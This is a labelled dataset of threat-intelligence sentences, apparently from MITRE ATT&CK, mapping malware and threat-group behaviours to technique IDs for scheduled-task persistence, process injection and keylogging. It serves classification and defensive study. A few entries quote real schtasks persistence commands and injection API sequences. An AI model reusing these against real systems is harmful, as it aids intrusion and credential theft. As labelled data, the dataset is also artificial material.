{"text1":"LitePower can create a scheduled task to enable persistence mechanisms.","labels":"['T1053.005']"}
{"text1":"Lokibot embedded the commands \"schtasks \/Run \/TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup \/I\" inside a batch script.","labels":"['T1053.005']"}
{"text1":"Lucifer has established persistence by creating the following scheduled task \"schtasks \/create \/sc minute \/mo 1 \/tn QQMusic ^ \/tr C:Users\\%USERPROFILE%\\Downloads\\spread.exe \/F\".","labels":"['T1053.005']"}
{"text1":"MCMD can use scheduled tasks for persistence.","labels":"['T1053.005']"}
{"text1":"Machete has created scheduled tasks to maintain Machete's persistence.","labels":"['T1053.005']"}
{"text1":"Machete used scheduled tasks for persistence.","labels":"['T1053.005']"}
{"text1":"Maze has created scheduled tasks using name variants such as \"Windows Update Security\", \"Windows Update Security Patches\", and \"Google Chrome Security Update\", to launch Maze at a specific time.","labels":"['T1053.005']"}
{"text1":"Meteor execution begins from a scheduled task named `Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00.","labels":"['T1053.005']"}
{"text1":"Milan can establish persistence on a targeted host with scheduled tasks.","labels":"['T1053.005']"}
{"text1":"MuddyWater has used scheduled tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.","labels":"['T1053.005']"}
{"text1":"NETWIRE can create a scheduled task to establish persistence.","labels":"['T1053.005']"}
{"text1":"Okrum's installer can attempt to achieve persistence by creating a scheduled task.","labels":"['T1053.005']"}
{"text1":"One persistence mechanism used by CozyCar is to register itself as a scheduled task.","labels":"['T1053.005']"}
{"text1":"OopsIE creates a scheduled task to run itself every three minutes.","labels":"['T1053.005']"}
{"text1":"Operation Wocao has used scheduled tasks to execute malicious PowerShell code on remote systems.","labels":"['T1053.005']"}
{"text1":"PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish via a Scheduled Task\/Job.","labels":"['T1053.005']"}
{"text1":"Pteranodon schedules tasks to invoke its components in order to establish persistence.","labels":"['T1053.005']"}
{"text1":"QUADAGENT creates a scheduled task to maintain persistence on the victim\u2019s machine.","labels":"['T1053.005']"}
{"text1":"RTM tries to add a scheduled task to establish persistence.","labels":"['T1053.005']"}
{"text1":"RainyDay can use scheduled tasks to achieve persistence.","labels":"['T1053.005']"}
{"text1":"Ramsay can schedule tasks via the Windows COM API to maintain persistence.","labels":"['T1053.005']"}
{"text1":"Rancor launched a scheduled task to gain persistence using the \"schtasks \/create \/sc\" command.","labels":"['T1053.005']"}
{"text1":"Remexi utilizes scheduled tasks as a persistence mechanism.","labels":"['T1053.005']"}
{"text1":"RemoteCMD can execute commands remotely by creating a new schedule task on the remote system","labels":"['T1053.005']"}
{"text1":"Ryuk can remotely create a scheduled task to execute itself on a system.","labels":"['T1053.005']"}
{"text1":"SQLRat has created scheduled tasks in \"%appdata%\\Roaming\\Microsoft\\Templates\\\".","labels":"['T1053.005']"}
{"text1":"Saint Bot has created a scheduled task named \"Maintenance\" to establish persistence.","labels":"['T1053.005']"}
{"text1":"ServHelper contains modules that will use schtasks to carry out malicious operations.","labels":"['T1053.005']"}
{"text1":"SharpStage has a persistence component to write a scheduled task for the payload.","labels":"['T1053.005']"}
{"text1":"Stealth Falcon malware creates a scheduled task entitled \u201cIE Web Cache\u201d to execute a malicious file hourly.","labels":"['T1053.005']"}
{"text1":"Stuxnet schedules a network job to execute two minutes after host infection.","labels":"['T1053.005']"}
{"text1":"TEMP.Veles has used scheduled task XML triggers.","labels":"['T1053.005']"}
{"text1":"Tarrask is able to create \u201chidden\u201d scheduled tasks for persistence.","labels":"['T1053.005']"}
{"text1":"Tomiris has used `SCHTASKS \/CREATE \/SC DAILY \/TN StartDVL \/TR \"[path to self]\" \/ST 10:00` to establish persistence.","labels":"['T1053.005']"}
{"text1":"TrickBot creates a scheduled task on the system that provides persistence.","labels":"['T1053.005']"}
{"text1":"Zebrocy has a command to create a scheduled task for persistence.","labels":"['T1053.005']"}
{"text1":"ccf32 can run on a daily basis using a scheduled task.","labels":"['T1053.005']"}
{"text1":"menuPass has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.","labels":"['T1053.005']"}
{"text1":"schtasks is used to schedule tasks on a Windows system to run at a specific date and time.","labels":"['T1053.005']"}
{"text1":"yty establishes persistence by creating a scheduled task with the command \"SchTasks \/Create \/SC DAILY \/TN BigData \/TR \u201c + path_file + \u201c\/ST 09:30\u201c\".","labels":"['T1053.005']"}
{"text1":"zwShell has used SchTasks for execution.","labels":"['T1053.005']"}
{"text1":"ABK has the ability to inject shellcode into svchost.exe.","labels":"['T1055']"}
{"text1":"APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe.","labels":"['T1055']"}
{"text1":"APT37 injects its malware variant, ROKRAT, into the cmd.exe process.","labels":"['T1055']"}
{"text1":"APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.","labels":"['T1055']"}
{"text1":"Agent Tesla can inject into known, vulnerable binaries on targeted hosts.","labels":"['T1055']"}
{"text1":"Attor's dispatcher can inject itself into running processes to gain higher privileges and to evade detection.","labels":"['T1055']"}
{"text1":"AuditCred can inject code from files to other running processes.","labels":"['T1055']"}
{"text1":"Avenger has the ability to inject shellcode into svchost.exe.","labels":"['T1055']"}
{"text1":"BBK has the ability to inject shellcode into svchost.exe.","labels":"['T1055']"}
{"text1":"Bumblebee can inject code into multiple processes on infected endpoints.","labels":"['T1055']"}
{"text1":"Cardinal RAT injects into a newly spawned process created from a native Windows executable.","labels":"['T1055']"}
{"text1":"Clambling can inject into the `svchost.exe` process for execution.","labels":"['T1055']"}
{"text1":"Cobalt Group has injected code into trusted processes.","labels":"['T1055']"}
{"text1":"Donut includes a subproject \"DonutTest\" to inject shellcode into a target process.","labels":"['T1055']"}
{"text1":"During Operation Sharpshooter, threat actors leveraged embedded shellcode to inject a downloader into the memory of Word.","labels":"['T1055']"}
{"text1":"During Operation Wocao, threat actors injected code into a selected process, which in turn launches a command as a child process of the original.","labels":"['T1055']"}
{"text1":"Gazer injects its communication module into an Internet accessible process through which it performs C2.","labels":"['T1055']"}
{"text1":"GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process.","labels":"['T1055']"}
{"text1":"HOPLIGHT has injected into running processes.","labels":"['T1055']"}
{"text1":"HiddenWasp adds itself to the LD_PRELOAD path and sets a series of environment variables.","labels":"['T1055']"}
{"text1":"Honeybee uses a batch file to load a DLL into the svchost.exe process.","labels":"['T1055']"}
{"text1":"InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.","labels":"['T1055']"}
{"text1":"IronNetInjector can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.","labels":"['T1055']"}
{"text1":"JHUHUGIT performs code injection injecting its own functions to browser processes.","labels":"['T1055']"}
{"text1":"JPIN can inject content into lsass.exe to load a module.","labels":"['T1055']"}
{"text1":"Kimsuky has used Win7Elevate to inject malicious code into explorer.exe.","labels":"['T1055']"}
{"text1":"Lizar can migrate the loader into another process.","labels":"['T1055']"}
{"text1":"Mis-Type has been injected directly into a running process, including `explorer.exe`.","labels":"['T1055']"}
{"text1":"NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.","labels":"['T1055']"}
{"text1":"NavRAT copies itself into a running Internet Explorer process to evade detection.","labels":"['T1055']"}
{"text1":"PLATINUM has used various methods of process injection including hot patching.","labels":"['T1055']"}
{"text1":"Pandora can start and inject code into a new `svchost` process.","labels":"['T1055']"}
{"text1":"PoshC2 contains multiple modules for injecting into processes, such as \"Invoke-PSInject\".","labels":"['T1055']"}
{"text1":"QakBot can inject itself into processes including explore.exe, Iexplore.exe, and Mobsync.exe.","labels":"['T1055']"}
{"text1":"REvil can inject itself into running processes on a compromised host.","labels":"['T1055']"}
{"text1":"ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`.","labels":"['T1055']"}
{"text1":"SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process.","labels":"['T1055']"}
{"text1":"SLOTHFULMEDIA can inject into running processes on a compromised host.","labels":"['T1055']"}
{"text1":"ShadowPad has injected an install module into a newly created process.","labels":"['T1055']"}
{"text1":"Silence has injected a DLL library containing a Trojan into the fwmain32.exe process.","labels":"['T1055']"}
{"text1":"Smoke Loader injects into the Internet Explorer process.","labels":"['T1055']"}
{"text1":"StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser.","labels":"['T1055']"}
{"text1":"The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes.","labels":"['T1055']"}
{"text1":"TrickBot has used \"Nt*\" Native API functions to inject code into legitimate processes such as \"wermgr.exe\".","labels":"['T1055']"}
{"text1":"Turla has also used PowerSploit's \"Invoke-ReflectivePEInjection.ps1\" to reflectively load a PowerShell payload into a random process on the victim system.","labels":"['T1055']"}
{"text1":"WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation.","labels":"['T1055']"}
{"text1":"Waterbear can inject decrypted shellcode into the LanmanServer service.","labels":"['T1055']"}
{"text1":"Wiarp creates a backdoor through which remote attackers can inject files into running processes.","labels":"['T1055']"}
{"text1":"Wingbird performs multiple process injections to hijack system processes and execute malicious code.","labels":"['T1055']"}
{"text1":"gh0st RAT can inject malicious code into process created by the \u201cCommand_Create&Inject\u201d function.","labels":"['T1055']"}
{"text1":"injects a malicious DLL into the IExplorer.exe process.","labels":"['T1055']"}
{"text1":"A Lazarus Group malware sample performs reflective DLL injection.","labels":"['T1055.001']"}
{"text1":"After decrypting itself in memory, RARSTONE downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This \u201cdownloaded\u201d file is actually not dropped onto the system.","labels":"['T1055.001']"}
{"text1":"Aria-body has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.","labels":"['T1055.001']"}
{"text1":"Carberp's bootkit can inject a malicious DLL into the address space of running processes.","labels":"['T1055.001']"}
{"text1":"Carbon has a command to inject code into a process.","labels":"['T1055.001']"}
{"text1":"Duqu will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).","labels":"['T1055.001']"}
{"text1":"During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.","labels":"['T1055.001']"}
{"text1":"Dyre injects into other processes to load modules.","labels":"['T1055.001']"}
{"text1":"Elise injects DLL files into iexplore.exe.","labels":"['T1055.001']"}
{"text1":"Emissary injects its DLL file into a newly spawned Internet Explorer process.","labels":"['T1055.001']"}
{"text1":"Emotet has been observed injecting in to Explorer.exe and other processes.","labels":"['T1055.001']"}
{"text1":"Gelsemium has the ability to inject DLLs into specific processes.","labels":"['T1055.001']"}
{"text1":"Get2 has the ability to inject DLLs into processes.","labels":"['T1055.001']"}
{"text1":"HIDEDRV injects a DLL for Downdelph into the explorer.exe process.","labels":"['T1055.001']"}
{"text1":"If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes.","labels":"['T1055.001']"}
{"text1":"Koadic can perform process injection by using a reflective DLL.","labels":"['T1055.001']"}
{"text1":"Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.","labels":"['T1055.001']"}
{"text1":"Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT.","labels":"['T1055.001']"}
{"text1":"Maze has injected the malware DLL into a target process.","labels":"['T1055.001']"}
{"text1":"MegaCortex loads \"injecthelper.dll\" into a newly created \"rundll32.exe\" process.","labels":"['T1055.001']"}
{"text1":"Metamorfo has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).","labels":"['T1055.001']"}
{"text1":"Mongall can inject a DLL into `rundll32.exe` for execution.","labels":"['T1055.001']"}
{"text1":"PS1 can inject its payload DLL Into memory.","labels":"['T1055.001']"}
{"text1":"PipeMon can inject its modules into various processes using reflective DLL loading.","labels":"['T1055.001']"}
{"text1":"PoisonIvy can inject a malicious DLL into a process.","labels":"['T1055.001']"}
{"text1":"Pupy can migrate into another process using reflective DLL injection.","labels":"['T1055.001']"}
{"text1":"RATANKBA performs a reflective DLL injection using a given pid.","labels":"['T1055.001']"}
{"text1":"Remsec can perform DLL injection.","labels":"['T1055.001']"}
{"text1":"SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process.","labels":"['T1055.001']"}
{"text1":"Saint Bot has injected its DLL component into `EhStorAurhn.exe`.","labels":"['T1055.001']"}
{"text1":"Socksbot creates a suspended svchost process and injects its DLL into it.","labels":"['T1055.001']"}
{"text1":"SombRAT can execute \"loadfromfile\", \"loadfromstorage\", and \"loadfrommem\" to inject a DLL  from disk, storage, or memory respectively.","labels":"['T1055.001']"}
{"text1":"Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.","labels":"['T1055.001']"}
{"text1":"Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.","labels":"['T1055.001']"}
{"text1":"Taidoor can perform DLL loading.","labels":"['T1055.001']"}
{"text1":"The Bumblebee loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.","labels":"['T1055.001']"}
{"text1":"The FunnyDream FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.","labels":"['T1055.001']"}
{"text1":"The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.","labels":"['T1055.001']"}
{"text1":"Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.","labels":"['T1055.001']"}
{"text1":"Turla has used Metasploit to perform reflective DLL injection in order to escalate privileges.","labels":"['T1055.001']"}
{"text1":"Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.","labels":"['T1055.001']"}
{"text1":"ZxShell is injected into a shared SVCHOST process.","labels":"['T1055.001']"}
{"text1":"Carbanak downloads an executable and injects it directly into a new process.","labels":"['T1055.002']"}
{"text1":"GreyEnergy has a module to inject a PE binary into a remote process.","labels":"['T1055.002']"}
{"text1":"Lizar can execute PE files in the address space of the specified process.","labels":"['T1055.002']"}
{"text1":"Rocke's miner, \"TermsHost.exe\", evaded defenses by injecting itself into Windows processes, including Notepad.exe.","labels":"['T1055.002']"}
{"text1":"Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process.","labels":"['T1055.002']"}
{"text1":"Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.","labels":"['T1055.003']"}
{"text1":"Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the \"ResumeThread\" API.","labels":"['T1055.003']"}
{"text1":"Waterbear can use thread injection to inject shellcode into the process of security software.","labels":"['T1055.003']"}
{"text1":"Attor performs the injection by attaching its code into the APC queue using NtQueueApcThread API.","labels":"['T1055.004']"}
{"text1":"Bumblebee can use asynchronous procedure call (APC) injection to execute commands received from C2.","labels":"['T1055.004']"}
{"text1":"Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread.","labels":"['T1055.004']"}
{"text1":"FIN8 has injected malicious code into a new svchost.exe process.","labels":"['T1055.004']"}
{"text1":"IcedID has used \"ZwQueueApcThread\" to inject itself into remote processes.","labels":"['T1055.004']"}
{"text1":"InvisiMole can inject its code into a trusted process via the APC queue.","labels":"['T1055.004']"}
{"text1":"Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe.","labels":"['T1055.004']"}
{"text1":"Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.","labels":"['T1055.004']"}
{"text1":"TURNEDUP is capable of injecting code into the APC queue of a created Rundll32 process as part of an \"Early Bird injection.\"","labels":"['T1055.004']"}
{"text1":"Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.","labels":"['T1055.011']"}
{"text1":"Power Loader overwrites Explorer\u2019s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.","labels":"['T1055.011']"}
{"text1":"A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.","labels":"['T1055.012']"}
{"text1":"Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.","labels":"['T1055.012']"}
{"text1":"Azorult can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.","labels":"['T1055.012']"}
{"text1":"BBSRAT has been seen loaded into msiexec.exe through process hollowing to hide its execution.","labels":"['T1055.012']"}
{"text1":"Bandook has been launched by starting iexplore.exe and replacing it with Bandook's payload.","labels":"['T1055.012']"}
{"text1":"Bazar can inject into a target process including Svchost, Explorer, and cmd using process hollowing.","labels":"['T1055.012']"}
{"text1":"Clambling can execute binaries through process hollowing.","labels":"['T1055.012']"}
{"text1":"Cobalt Strike can use process hollowing for execution.","labels":"['T1055.012']"}
{"text1":"Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.","labels":"['T1055.012']"}
{"text1":"Duqu is capable of loading executable code via process hollowing.","labels":"['T1055.012']"}
{"text1":"Gorgon Group malware can use process hollowing to inject one of its trojans into another process.","labels":"['T1055.012']"}
{"text1":"ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.","labels":"['T1055.012']"}
{"text1":"Kimsuky has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing.","labels":"['T1055.012']"}
{"text1":"Lokibot has used process hollowing to inject itself into legitimate Windows process.","labels":"['T1055.012']"}
{"text1":"RCSession can launch itself from a hollowed svchost.exe process.","labels":"['T1055.012']"}
{"text1":"Smoke Loader spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware.","labels":"['T1055.012']"}
{"text1":"Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload.","labels":"['T1055.012']"}
{"text1":"The NETWIRE payload has been injected into benign Microsoft executables via process hollowing.","labels":"['T1055.012']"}
{"text1":"The Saint Bot loader has used API calls to spawn `MSBuild.exe` in a suspended state before injecting the decrypted Saint Bot binary into it.","labels":"['T1055.012']"}
{"text1":"TrickBot injects into the svchost.exe process.","labels":"['T1055.012']"}
{"text1":"Ursnif has used process hollowing to inject into child processes.","labels":"['T1055.012']"}
{"text1":"WhisperGate has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.","labels":"['T1055.012']"}
{"text1":"Bazar can inject into a target process using process doppelg\u00e4nging.","labels":"['T1055.013']"}
{"text1":"Leafminer has used Process Doppelg\u00e4nging to evade security software while deploying tools on compromised systems.","labels":"['T1055.013']"}
{"text1":"SynAck abuses NTFS transactions to launch and conceal malicious processes.","labels":"['T1055.013']"}
{"text1":"InvisiMole has used ListPlanting to inject code into a trusted process.","labels":"['T1055.015']"}
{"text1":"APT39 has utilized tools to capture mouse movements.","labels":"['T1056']"}
{"text1":"ADVSTORESHELL can perform keylogging.","labels":"['T1056.001']"}
{"text1":"APT28 has used tools to perform keylogging.","labels":"['T1056.001']"}
{"text1":"APT3 has used a keylogging tool that records keystrokes in encrypted files.","labels":"['T1056.001']"}
{"text1":"APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes.","labels":"['T1056.001']"}
{"text1":"APT38 used a Trojan called KEYLIME to capture keystrokes from the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"APT39 has used tools for capturing keystrokes.","labels":"['T1056.001']"}
{"text1":"APT41 used a keylogger called GEARSHIFT on a target system.","labels":"['T1056.001']"}
{"text1":"Agent Tesla can log keystrokes on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Ajax Security Team has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.","labels":"['T1056.001']"}
{"text1":"AppleSeed can use \"GetKeyState\" and \"GetKeyboardState\" to capture keystrokes on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Astaroth logs keystrokes from the victim's machine.","labels":"['T1056.001']"}
{"text1":"BISCUIT can capture keystrokes.","labels":"['T1056.001']"}
{"text1":"BadPatch has a keylogging capability.","labels":"['T1056.001']"}
{"text1":"Bandook contains keylogging capabilities.","labels":"['T1056.001']"}
{"text1":"BlackEnergy has run a keylogger plug-in on a victim.","labels":"['T1056.001']"}
{"text1":"CHOPSTICK is capable of performing keylogging.","labels":"['T1056.001']"}
{"text1":"Carbanak logs key strokes for configured processes and sends them back to the C2 server.","labels":"['T1056.001']"}
{"text1":"Cardinal RAT can log keystrokes.","labels":"['T1056.001']"}
{"text1":"Catchamas collects keystrokes from the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Cobalt Strike can track key presses with a keylogger module.","labels":"['T1056.001']"}
{"text1":"Cobian RAT has a feature to perform keylogging on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"CosmicDuke uses a keylogger.","labels":"['T1056.001']"}
{"text1":"Crimson can use a module to perform keylogging on compromised hosts.","labels":"['T1056.001']"}
{"text1":"Cuba logs keystrokes via polling by using \"GetKeyState\" and \"VkKeyScan\" functions.","labels":"['T1056.001']"}
{"text1":"DarkComet has a keylogging capability.","labels":"['T1056.001']"}
{"text1":"DarkWatchman can track key presses with a keylogger module.","labels":"['T1056.001']"}
{"text1":"Darkhotel has used a keylogger.","labels":"['T1056.001']"}
{"text1":"Dtrack\u2019s dropper contains a keylogging executable.","labels":"['T1056.001']"}
{"text1":"Duqu can track key presses with a keylogger module.","labels":"['T1056.001']"}
{"text1":"DustySky contains a keylogger.","labels":"['T1056.001']"}
{"text1":"ECCENTRICBANDWAGON can capture and store keystrokes.","labels":"['T1056.001']"}
{"text1":"EvilGrab has the capability to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"FIN4 has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.","labels":"['T1056.001']"}
{"text1":"FakeM contains a keylogger module.","labels":"['T1056.001']"}
{"text1":"FlawedAmmyy can collect keyboard events.","labels":"['T1056.001']"}
{"text1":"Fysbis can perform keylogging.","labels":"['T1056.001']"}
{"text1":"Grandoreiro can log keystrokes on the victim's machine.","labels":"['T1056.001']"}
{"text1":"GreyEnergy has a module to harvest pressed keystrokes.","labels":"['T1056.001']"}
{"text1":"HEXANE has used a PowerShell-based keylogger named `kl.ps1`.","labels":"['T1056.001']"}
{"text1":"HTTPBrowser is capable of capturing keystrokes on victims.","labels":"['T1056.001']"}
{"text1":"Imminent Monitor has a keylogging module.","labels":"['T1056.001']"}
{"text1":"KGH_SPY can perform keylogging by polling the \"GetAsyncKeyState()\" function.","labels":"['T1056.001']"}
{"text1":"KONNI has the capability to perform keylogging.","labels":"['T1056.001']"}
{"text1":"Kasidet has the ability to initiate keylogging.","labels":"['T1056.001']"}
{"text1":"KeyBoy installs a keylogger for intercepting credentials and keystrokes.","labels":"['T1056.001']"}
{"text1":"Kimsuky has used a PowerShell-based keylogger as well as a tool called MECHANICAL to log keystrokes.","labels":"['T1056.001']"}
{"text1":"Kivars has the ability to initiate keylogging on the infected host.","labels":"['T1056.001']"}
{"text1":"Lazarus Group malware KiloAlfa contains keylogging functionality.","labels":"['T1056.001']"}
{"text1":"Lokibot has the ability to capture input on the compromised host via keylogging.","labels":"['T1056.001']"}
{"text1":"MacMa can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords.","labels":"['T1056.001']"}
{"text1":"MacSpy captures keystrokes.","labels":"['T1056.001']"}
{"text1":"Matryoshka is capable of keylogging.","labels":"['T1056.001']"}
{"text1":"Metamorfo has a command to launch a keylogger and capture keystrokes on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Micropsia has keylogging capabilities.","labels":"['T1056.001']"}
{"text1":"MoonWind has a keylogger.","labels":"['T1056.001']"}
{"text1":"NanoCore can perform keylogging on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"NavRAT logs the keystrokes on the targeted system.","labels":"['T1056.001']"}
{"text1":"OilRig has used keylogging tools called KEYPUNCH and LONGWATCH.","labels":"['T1056.001']"}
{"text1":"Okrum was seen using a keylogger tool to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"One of Attor's plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.","labels":"['T1056.001']"}
{"text1":"Operation Wocao has obtained the password for the victim's password manager via a custom keylogger.","labels":"['T1056.001']"}
{"text1":"OwaAuth captures and DES-encrypts credentials before writing the username and password to a log file, \"C:\\log.txt\".","labels":"['T1056.001']"}
{"text1":"PLATINUM has used several different keyloggers.","labels":"['T1056.001']"}
{"text1":"Peppy can log keystrokes on compromised hosts.","labels":"['T1056.001']"}
{"text1":"PlugX has a module for capturing keystrokes per process including window titles.","labels":"['T1056.001']"}
{"text1":"PoisonIvy contains a keylogger.","labels":"['T1056.001']"}
{"text1":"PoshC2 has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.","labels":"['T1056.001']"}
{"text1":"PowerSploit's \"Get-Keystrokes\" Exfiltration module can log keystrokes.","labels":"['T1056.001']"}
{"text1":"Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows.","labels":"['T1056.001']"}
{"text1":"Pupy uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.","labels":"['T1056.001']"}
{"text1":"QakBot can capture keystrokes on a compromised host.","labels":"['T1056.001']"}
{"text1":"QuasarRAT has a built-in keylogger.","labels":"['T1056.001']"}
{"text1":"ROKRAT can use  `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"RTM can record keystrokes from both the keyboard and virtual keyboard.","labels":"['T1056.001']"}
{"text1":"Regin contains a keylogger.","labels":"['T1056.001']"}
{"text1":"Remcos has a command for keylogging.","labels":"['T1056.001']"}
{"text1":"Remexi gathers and exfiltrates keystrokes from the machine.","labels":"['T1056.001']"}
{"text1":"Remsec contains a keylogger component.","labels":"['T1056.001']"}
{"text1":"Rover has keylogging functionality.","labels":"['T1056.001']"}
{"text1":"RunningRAT captures keystrokes and sends them back to the C2 server.","labels":"['T1056.001']"}
{"text1":"SLOTHFULMEDIA has a keylogging capability.","labels":"['T1056.001']"}
{"text1":"SMOKEDHAM can continuously capture keystrokes.","labels":"['T1056.001']"}
{"text1":"Sandworm Team has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.","labels":"['T1056.001']"}
{"text1":"Sowbug has used keylogging tools.","labels":"['T1056.001']"}
{"text1":"SslMM creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.","labels":"['T1056.001']"}
{"text1":"Sykipot contains keylogging functionality to steal passwords.","labels":"['T1056.001']"}
{"text1":"TajMahal has the ability to capture keystrokes on an infected host.","labels":"['T1056.001']"}
{"text1":"The FunnyDream Keyrecord component can capture keystrokes.","labels":"['T1056.001']"}
{"text1":"The executable version of Helminth has a module to log keystrokes.","labels":"['T1056.001']"}
{"text1":"ThiefQuest uses the \"CGEventTap\" functions to perform keylogging.","labels":"['T1056.001']"}
{"text1":"Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"TinyZBot contains keylogger functionality.","labels":"['T1056.001']"}
{"text1":"Tonto Team has used keylogging tools in their operations.","labels":"['T1056.001']"}
{"text1":"Trojan.Karagany can capture keystrokes on a compromised host.","labels":"['T1056.001']"}
{"text1":"Unknown Logger is capable of recording keystrokes.","labels":"['T1056.001']"}
{"text1":"VERMIN collects keystrokes from the victim machine.","labels":"['T1056.001']"}
{"text1":"XAgentOSX contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.","labels":"['T1056.001']"}
{"text1":"Zeus Panda can perform keylogging on the victim\u2019s machine by hooking the functions TranslateMessage and WM_KEYDOWN.","labels":"['T1056.001']"}
{"text1":"ZxShell has a feature to capture a remote computer's keystrokes using a keylogger.","labels":"['T1056.001']"}
{"text1":"jRAT has the capability to log keystrokes from the victim\u2019s machine, both offline and online.","labels":"['T1056.001']"}
{"text1":"menuPass has used key loggers to steal usernames and passwords.","labels":"['T1056.001']"}
{"text1":"yty uses a keylogger plugin to gather keystrokes.","labels":"['T1056.001']"}
{"text1":"Calisto presents an input prompt asking for the user's login and password.","labels":"['T1056.002']"}
{"text1":"Dok prompts the user for credentials.","labels":"['T1056.002']"}
{"text1":"FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials.","labels":"['T1056.002']"}
{"text1":"Keydnap prompts the users for credentials.","labels":"['T1056.002']"}
{"text1":"Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims.","labels":"['T1056.002']"}
{"text1":"XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process \"\/Applications\/Safari.app\/Contents\/MacOS\/SafariForWebKitDevelopment\".","labels":"['T1056.002']"}
{"text1":"iKitten prompts the user for their credentials.","labels":"['T1056.002']"}
{"text1":"Empire contains some modules that leverage API hooking to carry out tasks, such as netripper.","labels":"['T1056.004']"}
{"text1":"NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.","labels":"['T1056.004']"}
{"text1":"PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access.","labels":"['T1056.004']"}
{"text1":"RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface.","labels":"['T1056.004']"}
